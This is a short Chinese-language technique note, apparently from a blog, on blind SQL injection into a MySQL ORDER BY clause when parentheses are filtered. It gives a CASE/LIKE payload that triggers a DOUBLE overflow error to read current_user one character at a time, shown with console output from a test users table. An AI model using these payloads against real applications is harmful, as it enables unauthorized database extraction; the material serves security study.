0x00 概要
不允许 “括号” 出现时的注入方法
id-case when 1 like 1 then 0 else 2*1e308 end
0x01 测试数据
mysql> select user();+----------------+| user() |+----------------+| root@localhost |+----------------+1 row in set (0.00 sec)
mysql> select current_user;+----------------+| current_user |+----------------+| root@localhost |+----------------+1 row in set (0.00 sec)
0x02 测试
注意:
如果使用了like又使用了延时会导致全表查询
例如:
tdb_goods 表 数据为 23 条
延时 0.1S
0.1 * 23 = 2.3S 最后会延时2.3S 所以要尽量避免这样干
// 正确的情况
// 会返回原来的数据页面保持不变
mysql> select * from users order by id-case when 1 like 1 then 0 else 2*1e308 end;+----+----------+------------+| id | username | password |+----+----------+------------+| 1 | Dumb | Dumb || 2 | Angelina | I-kill-you || 3 | Dummy | p@ssword || 4 | secure | crappy || 5 | stupid | stupidity || 6 | superman | genious || 7 | batman | mob!le || 8 | admin | admin || 9 | admin1 | admin1 || 10 | admin2 | admin2 || 11 | admin3 | admin3 || 12 | dhakkan | dumbo || 14 | admin4 | admin4 |+----+----------+------------+13 rows in set (0.00 sec)
// 查询current_user数据正确的情况
// 会返回原来的数据页面保持不变,说明 current_user 第一位为 “r”
mysql> select * from users order by id-case when current_user like 'r%' then 0 else 2*1e308 end;+----+----------+------------+| id | username | password |+----+----------+------------+| 1 | Dumb | Dumb || 2 | Angelina | I-kill-you || 3 | Dummy | p@ssword || 4 | secure | crappy || 5 | stupid | stupidity || 6 | superman | genious || 7 | batman | mob!le || 8 | admin | admin || 9 | admin1 | admin1 || 10 | admin2 | admin2 || 11 | admin3 | admin3 || 12 | dhakkan | dumbo || 14 | admin4 | admin4 |+----+----------+------------+13 rows in set (0.00 sec)
/
// 错误的情况// 页面会爆错,如果关闭了错误提示,页面的数据会为空mysql> select * from users order by id-case when current_user like 's%' then 0 else 2*1e308 end;ERROR 1690 (22003): DOUBLE value is out of range in '(2 * 1e308)'
若有收获,就点个赞吧
0 人点赞
